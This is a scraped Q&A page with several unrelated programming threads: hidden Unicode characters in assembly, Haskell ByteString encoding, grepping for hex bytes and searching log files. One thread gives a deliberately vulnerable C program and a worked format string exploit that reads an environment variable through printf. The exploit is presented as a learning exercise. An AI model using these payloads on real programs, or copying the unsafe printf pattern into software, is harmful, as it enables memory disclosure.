I have trouble compiling my assembly code.
gcc returns: func_select.s:5: Error: invalid character (0xe2) in mnemonic
func_select.s:7: Error: invalid character (0xe2) in mnemonic
here is the code (lines 5-7):
secondStringLength: .string " second pstring length: %d\n"
OldChar: .string "old char: %c,"
NewChar: .string " new char: %c,"
How can I fix this?
Remove the formatting characters embedded in the text.
$ charinfo 'secondStringLength:.string " second pstring length: %d\n"'
U+0073 LATIN SMALL LETTER S [Ll]
U+0065 LATIN SMALL LETTER E [Ll]
...
U+0068 LATIN SMALL LETTER H [Ll]
U+003A COLON [Po]
U+202B RIGHT-TO-LEFT EMBEDDING [Cf]
U+202A LEFT-TO-RIGHT EMBEDDING [Cf]
U+002E FULL STOP [Po]
U+0073 LATIN SMALL LETTER S [Ll]
...
U+0025 PERCENT SIGN [Po]
U+0064 LATIN SMALL LETTER D [Ll]
U+202C POP DIRECTIONAL FORMATTING [Cf]
U+202C POP DIRECTIONAL FORMATTING [Cf]
U+005C REVERSE SOLIDUS [Po]
U+006E LATIN SMALL LETTER N [Ll]
U+0022 QUOTATION MARK [Po]
Igancio Vazquez-Abrams is right. To provide more detail, according to xxd this is your first line:
$ cat b | xxd
00000000: 7365 636f 6e64 5374 7269 6e67 4c65 6e67 secondStringLeng
00000010: 7468 3a20 2020 2020 e280 abe2 80aa 2e73 th: .......s
00000020: 7472 696e 6720 2220 7365 636f 6e64 2070 tring " second p
00000030: 7374 7269 6e67 206c 656e 6774 683a 2025 string length: %
00000040: 64e2 80ac e280 ac5c 6e22 0a0a d......\n"..
Note: e2 80 ab and then e2 80 aa. These are the U+202B and U+202A mentioned earlier. Remove them (as well as the next 2 U+202C).
Related
I'm trying to read a value from the environment by using the format string vulnerability.
This type of vulnerability is documented all over the web, however the examples that I've found only cover 32 bits Linux, and my desktop's running a 64 bit Linux.
This is the code I'm using to run my tests on:
//fmt.c
#include <stdio.h>
#include <string.h>
int main (int argc, char *argv[]) {
char string[1024];
if (argc < 2)
return 0;
strcpy( string, argv[1] );
printf( "vulnerable string: %s\n", string );
printf( string );
printf( "\n" );
}
After compiling that I put my test variable and get its address. Then I pass it to the program as a parameter and I add a bunch of format in order to read from them:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ ./getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
$ printf '\xcb\xef\xff\xff\xff\x7f' | od -vAn -tx1c
cb ef ff ff ff 7f
313 357 377 377 377 177
$ ./fmt $(printf '\xcb\xef\xff\xff\xff\x7f')`python -c "print('%016lx.'*10)"`
vulnerable string: %016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.%016lx.
00000000004052a0.0000000000000000.0000000000000000.00000000ffffffff.0000000000000060.
0000000000000001.00000060f7ffd988.00007fffffffd770.00007fffffffd770.30257fffffffefcb.
$ echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c" | od -vAn -tx1c
cb ef ff ff ff 7f 25 31 30 24 31 36 6c 78
313 357 377 377 377 177 % 1 0 $ 1 6 l x
$ ./fmt $(echo '\xcb\xef\xff\xff\xff\x7f%10$16lx'"\c")
vulnerable string: %10$16lx
31257fffffffefcb
The 10th value contains the address I want to read from, however it's not padded with 0s but with the value 3125 instead.
Is there a way to properly pad that value so I can read the environment variable with something like the '%s' format?
So, after experimenting for a while, I ran into a way to read an environment variable by using the format string vulnerability.
It's a bit sloppy, but hey - it works.
So, first the usual. I create an environment value and find its location:
$ export FSTEST="Look at my horse, my horse is amazing."
$ echo $FSTEST
Look at my horse, my horse is amazing.
$ /getenvaddr FSTEST ./fmt
FSTEST: 0x7fffffffefcb
Now, no matter how I tried, putting the address before the format strings always got both mixed, so I moved the address to the back and added some padding of my own, so I could identify it and add more padding if needed.
Also, python and my environment don't get along with some escape sequences, so I ended up using a mix of both the python one-liner and printf (with an extra '%' due to the way the second printf parses a single '%' - be sure to remove this extra '%' after you test it with od/hexdump/whathaveyou)
$ printf `python -c "print('%%016lx|' *1)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00') | od -vAn -tx1c
25 30 31 36 6c 78 7c 2d 2d 2d 2d 2d 2d 2d 2d cb
% 0 1 6 l x | - - - - - - - - 313
ef ff ff ff 7f
357 377 377 377 177
With that solved, next step would be to find either the padding or (if you're lucky) the address.
I'm repeating the format string 110 times, but your mileage might vary:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '--------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|%016lx|...|--------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
0000000000000324|...|2d2d2d2d2d2d7c78|7fffffffefcb2d2d|0000038000000300|
00007fffffffd8d0|00007ffff7ffe6d0|--------
The consecutive '2d' values are just the hex values for '-'
After adding more '-' for padding and testing, I ended up with something like this:
./fmt `python -c "print('%016lx|' *110)"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
So, the address got pushed towards the very last format placeholder.
Let's modify the way we output these format placeholders so we can manipulate the last one in a more convenient way:
$ ./fmt `python -c "print('%016lx|' *109 + '%016lx|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c78|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|00007fffffffefcb|------------------------------
It should show the same result, but now it's possible to use an '%s' as the last placeholder.
Replacing '%016lx|' with just '%s|' wont work, because the extra padding is needed. So, I just add 4 extra '|' characters to compensate:
./fmt `python -c "print('%016lx|' *109 + '||||%s|')"\
`$(printf '------------------------------\xcb\xef\xff\xff\xff\x7f\x00')
vulnerable string: %016lx|%016lx|%016lx|...|||||%s|------------------------------
00000000004052a0|0000000000000000|0000000000000000|fffffffffffffff3|
000000000000033a|...|2d2d2d2d2d2d7c73|2d2d2d2d2d2d2d2d|2d2d2d2d2d2d2d2d|
2d2d2d2d2d2d2d2d|||||Look at my horse, my horse is amazing.|
------------------------------
Voilà, the environment variable got leaked.
Answering haskell-convert-unicode-sequence-to-utf-8 I came upon some strange behaviour of ByteString.putStrLn
{-# LANGUAGE OverloadedStrings #-}
module Main where
import Data.Text (Text)
import Data.ByteString (ByteString)
import qualified Data.ByteString.Char8 as B
inputB, inputB' :: ByteString
inputB = "ДЕЖЗИЙКЛМНОПРСТУФ"
inputB' = "test"
main :: IO ()
main = do putStr "B.putStrLn inputB: "; B.putStrLn inputB
putStr "print inputB: "; print inputB
putStr "B.putStrLn inputB': "; B.putStrLn inputB'
putStr "print inputB': "; print inputB'
which yields
B.putStrLn inputB:
rint inputB: "\DC4\NAK\SYN\ETB\CAN\EM\SUB\ESC\FS\GS\RS\US !\"#$"
B.putStrLn inputB': test
print inputB': "test"
what I do not understand here is - why the first output line is missing and the p in print on the second line is missing.
My guess would be that this has something to do with the russian letters leading to malformed input. Because with the simple case of "test" it just works.
Edit
Platform: Linux Mint 17.3
file-encoding: UTF-8
terminal: gnome-terminal/tmux/zsh
ghc: 7.10.3
stack: 1.0.4
xxd output
> stack exec -- unicode | xxd
00000000: 422e 7075 7453 7472 4c6e 2069 6e70 7574 B.putStrLn input
00000010: 423a 2014 1516 1718 191a 1b1c 1d1e 1f20 B: ............
00000020: 2122 2324 0a70 7269 6e74 2069 6e70 7574 !"#$.print input
00000030: 423a 2022 5c44 4334 5c4e 414b 5c53 594e B: "\DC4\NAK\SYN
00000040: 5c45 5442 5c43 414e 5c45 4d5c 5355 425c \ETB\CAN\EM\SUB\
00000050: 4553 435c 4653 5c47 535c 5253 5c55 5320 ESC\FS\GS\RS\US
00000060: 215c 2223 2422 0a42 2e70 7574 5374 724c !\"#$".B.putStrL
00000070: 6e20 696e 7075 7442 273a 2074 6573 740a n inputB': test.
00000080: 7072 696e 7420 696e 7075 7442 273a 2022 print inputB': "
00000090: 7465 7374 220a test".
libraries
> stack exec -- ghc-pkg list
/opt/ghc/7.10.3/lib/ghc-7.10.3/package.conf.d
Cabal-1.22.5.0
array-0.5.1.0
base-4.8.2.0
bin-package-db-0.0.0.0
binary-0.7.5.0
bytestring-0.10.6.0
containers-0.5.6.2
deepseq-1.4.1.1
directory-1.2.2.0
filepath-1.4.0.0
ghc-7.10.3
ghc-prim-0.4.0.0
haskeline-0.7.2.1
hoopl-3.10.0.2
hpc-0.6.0.2
integer-gmp-1.0.0.0
pretty-1.1.2.0
process-1.2.3.0
rts-1.0
template-haskell-2.10.0.0
terminfo-0.4.0.1
time-1.5.0.1
transformers-0.4.2.0
unix-2.7.1.0
xhtml-3000.2.1
/home/epsilonhalbe/.stack/snapshots/x86_64-linux/lts-5.5/7.10.3/pkgdb
text-1.2.2.0
/home/epsilonhalbe/programming/unicode/.stack-work/install/x86_64-linux/lts-5.5/7.10.3/pkgdb
and the locale
> locale
LANG=en_US.UTF-8
LANGUAGE=
LC_CTYPE="en_US.UTF-8"
LC_NUMERIC=de_AT.UTF-8
LC_TIME="en_US.UTF-8"
LC_COLLATE="en_US.UTF-8"
LC_MONETARY=de_AT.UTF-8
LC_MESSAGES="en_US.UTF-8"
LC_PAPER=de_AT.UTF-8
LC_NAME=de_AT.UTF-8
LC_ADDRESS=de_AT.UTF-8
LC_TELEPHONE=de_AT.UTF-8
LC_MEASUREMENT=de_AT.UTF-8
LC_IDENTIFICATION=de_AT.UTF-8
LC_ALL=
It is not a terminal problem, rather, the problem happens early in the conversion to ByteString. Remember, because you used OverloadedStrings
inputB = "ДЕЖЗИЙКЛМНОПРСТУФ"
is really shorthand for
inputB = fromString "ДЕЖЗИЙКЛМНОПРСТУФ"::ByteString
which does not convert to a bytestring using UTF8.
If, instead, you want the bytestring to contain utf8 encoded chars, use
import qualified Data.ByteString.UTF8 as BU
inputB = BU.fromString "ДЕЖЗИЙКЛМНОПРСТУФ"
then this will work
B.putStrLn inputB
Why is the "p" on line two missing?
I won't go into detail (because I don't know them), but the behavior is expected.... Because your terminal is expecting UTF8, and the Russian string is not UTF8.
UTF8 uses variable length byte character encodings.... Depending on the first byte in a char, it might expect more. Clearly the last byte in the Russian string started a UTF8 encoding that required more bytes, and the "p" was read in to that char. Your terminal seems to just ignore chars it can't print (mine prints garbage), so both the Russian string and the next char were lost.
You will note that the "p" is in the xxd output.... The terminal just considering it to be part of the unknown chars and not printing it.
Quoting from the documentation of Data.ByteString.Char8
(emphasis mine)
Manipulate ByteStrings using Char operations. All Chars will be
truncated to 8 bits. It can be expected that these functions will run
at identical speeds to their Word8 equivalents in Data.ByteString.
More specifically these byte strings are taken to be in the subset of
Unicode covered by code points 0-255. This covers Unicode Basic Latin,
Latin-1 Supplement and C0+C1 Controls.
Cyrillic is not allocated in code points 0x00-0xFF, so encoding issues are to be expected.
I would recommend against Data.ByteString.Char8 unless you are dealing with plain ASCII. Even if latin-1 encoded texts may work in certain environment, the latin-1 encoding is obsolescent and should die.
For handling general strings, use Data.Text instead. Conversion functions from ByteStrings to Text, and vice versa, are provided. Of course, these functions have to depend on some encoding.
With od -N 64 -i mpich
on Ubuntu 14.04 I have
0000000 1135000353 1135000810 1135005924 1135016843
0000020 1135027542 1135036186 1135041461 1135041331
0000040 1135043045 1135052773 1135063618 1135067789
0000060 1135064934 1135052521 1135033974 1135019865
0000100
How to convert these decimal shorts into ascii?
To show "these" decimals:
perl -ane 'shift #F; print map {pack "l",$_ } #F' <<EOS | od -c
0000000 1135000353 1135000810 1135005924 1135016843
0000020 1135027542 1135036186 1135041461 1135041331
0000040 1135043045 1135052773 1135063618 1135067789
0000060 1135064934 1135052521 1135033974 1135019865
0000100
EOS
My web app is displaying some bizarro output (unicode characters that shouldn't be there, etc.). The best I can reckon is that somehow I introduced a bad char somewhere in the source, but I can't figure out where.
I found this answer that states I can do something like:
grep -obUaP "<\x-hex pattern>" .
When I copy the unicode char out of the browser and into my Bless hex editor, it tells me that the exact bytes of the char are:
15 03 01 EF BF BD 02 02
How can I format <\xhex pattern> to match the exact bytes that I need. I tried:
grep -obUaP "<\x-15 03 01 EF BF BD 02 02>" .
But that doesn't work. Thoughts?
Check the post again. FrOsT is not including the '<' and '>' in his actual grep command. He only used the carats to enclose an example statement. His actual statement looks like this:
"\x01\x02"
not:
"<\x01\x02>"
I have a C source file on my computer that begins with the line:
#include <stdio.h>
When I run
grep -obUaP '\x69\x6E\x63\x6C\x75\x64\x65' io.c
I get
1:include
That is, the line number followed by only the string matching the pattern.
You may want to run
man grep
and find out what all those options mean.
It may be easiest to write the pattern of hex bytes to a separate file and load that into stdin for the search.
In this example there is a file sampletext, consisting of the 256 sequential bytes and the occasional newline, and searchstring, a sequence of characters to grep for.
$ xxd sampletext
00000000: 0001 0203 0405 0607 0809 0a0b 0c0d 0e0f ................
00000010: 0a10 1112 1314 1516 1718 191a 1b1c 1d1e ................
00000020: 1f0a 2021 2223 2425 2627 2829 2a2b 2c2d .. !"#$%&'()*+,-
00000030: 2e2f 0a30 3132 3334 3536 3738 393a 3b3c ./.0123456789:;<
00000040: 3d3e 3f0a 4041 4243 4445 4647 4849 4a4b =>?.#ABCDEFGHIJK
00000050: 4c4d 4e4f 0a50 5152 5354 5556 5758 595a LMNO.PQRSTUVWXYZ
00000060: 5b5c 5d5e 5f0a 6061 6263 6465 6667 6869 [\]^_.`abcdefghi
00000070: 6a6b 6c6d 6e6f 0a70 7172 7374 7576 7778 jklmno.pqrstuvwx
00000080: 797a 7b7c 7d7e 7f0a 8081 8283 8485 8687 yz{|}~..........
00000090: 8889 8a8b 8c8d 8e8f 0a90 9192 9394 9596 ................
000000a0: 9798 999a 9b9c 9d9e 9f0a a0a1 a2a3 a4a5 ................
000000b0: a6a7 a8a9 aaab acad aeaf 0ab0 b1b2 b3b4 ................
000000c0: b5b6 b7b8 b9ba bbbc bdbe bf0a c0c1 c2c3 ................
000000d0: c4c5 c6c7 c8c9 cacb cccd cecf 0ad0 d1d2 ................
000000e0: d3d4 d5d6 d7d8 d9da dbdc ddde df0a e0e1 ................
000000f0: e2e3 e4e5 e6e7 e8e9 eaeb eced eeef 0af0 ................
00000100: f1f2 f3f4 f5f6 f7f8 f9fa fbfc fdfe ff0a ................
$ xxd searchstring
00000000: 8081 8283 ....
By redirecting searchstring into stdin, grep can look for the bytes directly
$ grep -a "$(<searchstring)" sampletext | xxd
00000000: 8081 8283 8485 8687 8889 8a8b 8c8d 8e8f ................
00000010: 0a .
$ grep -ao "$(<searchstring)" sampletext | xxd
00000000: 8081 8283 0a .....
A log file has lots of data and is sorted based on data and time. The size of each log may vary in size.
I want to search for specific pattern in log file and if the pattern matches, it should display that particular log on the screen.
Any shell commands would be appreciable.
Log file example:-
07/17/2008 10:24:12.323411 >00.23
Line 441 of xx file
Dest IP Address: 192.189.52.255 Source IP Address: 192.189.52.200
000: 0101 0600 4D8C 444C 0000 0000 C0BD 34C8
008: C0BD 34C9 C0BD 34C9 0000 0000 FFFF FFFF
07/17/2008 10:24:12.323549 >000.000138
Use req data
000: 0231 7564 705F 7573 7272 6571 2073 6F63
07/17/2008 10:24:12.323566 >000.000017
Local 192.189.52.200 Port 68 : Remote 0.0.0.0 Port 0
000: 012D .-
000: 0000 0000 000A 0002 000A 012D ...........-
0: NULNUL NULNUL NULLF NULSTX NULLF SOH -
Here if I search for particular ip address 192.189.52.200. It should display whole event log correspondingly like,
07/17/2008 10:24:12.323566 >000.000017
Local 192.189.52.200 Port 68 : Remote 0.0.0.0 Port 0
000: 012D .-
000: 0000 0000 000A 0002 000A 012D ...........-
0: NULNUL NULNUL NULLF NULSTX NULLF -
This requires GNU AWK (gawk) because of using a regex for the record separator (RS).
#!/usr/bin/awk -f
BEGIN {
pattern = ARGV[1]
delete ARGV[1]
# could use --re-interval
d = "[0-9]"
RS = d d "/" d d "/" d d d d " " d d ":" d d ":" d d "[^\n]*\n"
}
NR > 1 && ($0 ~ pattern || rt ~ pattern) {
print rt
print $0
}
{
rt = RT # save RT for next record
}
It's not pretty, but it works.
Run it like this:
./script.awk regex logfile
Examples:
$ ./script.awk 'C0BD|012D' logfile
07/17/2008 10:24:12.323411 >00.23
Line 441 of xx file
Dest IP Address: 192.189.52.255 Source IP Address: 192.189.52.200
000: 0101 0600 4D8C 444C 0000 0000 C0BD 34C8
008: C0BD 34C9 C0BD 34C9 0000 0000 FFFF FFFF
07/17/2008 10:24:12.323566 >000.000017
Local 192.189.52.200 Port 68 : Remote 0.0.0.0 Port 0
000: 012D .-
000: 0000 0000 000A 0002 000A 012D ...........-
0: NULNUL NULNUL NULLF NULSTX NULLF SOH -
$ ./script.awk '10:24:12.323549' logfile
07/17/2008 10:24:12.323549 >000.000138
Use req data
000: 0231 7564 705F 7573 7272 6571 2073 6F63
You can use -A[n] flag with grep, where n us the number of lines after the match. e.g
grep -A6 '192.189.52.200' my.log
If you have Ruby or possibility to install it, you could write a script to parse the log file and print matching entries. Here is a script that should work:
filename=ARGV[0]
regexpArg=ARGV[1]
unless filename and regexpArg
puts "Usage: #{$0} <filename> <regexp>"
exit(1)
end
dateStr='\d\d\/\d\d\/\d\d\d\d'
timeStr='[0-9:.]+'
whitespace='\s+'
regexpStr = dateStr + whitespace + timeStr + whitespace + '>[0-9.]+'
recordStart=Regexp.new(regexpStr)
records=[]
file=File.new(filename, "r")
addingToRecord = false
currentRecord = ""
file.each_line { |line|
match = recordStart.match(line)
if addingToRecord
if match
records.push(currentRecord)
currentRecord = line
else
currentRecord += line
end
else
if match
addingToRecord = true
currentRecord = line
end
end
}
file.close
regexp=Regexp.new(regexpArg)
records.each { |r|
if regexp.match(r)
puts "----------------------------------------"
puts r
puts "----------------------------------------"
end
}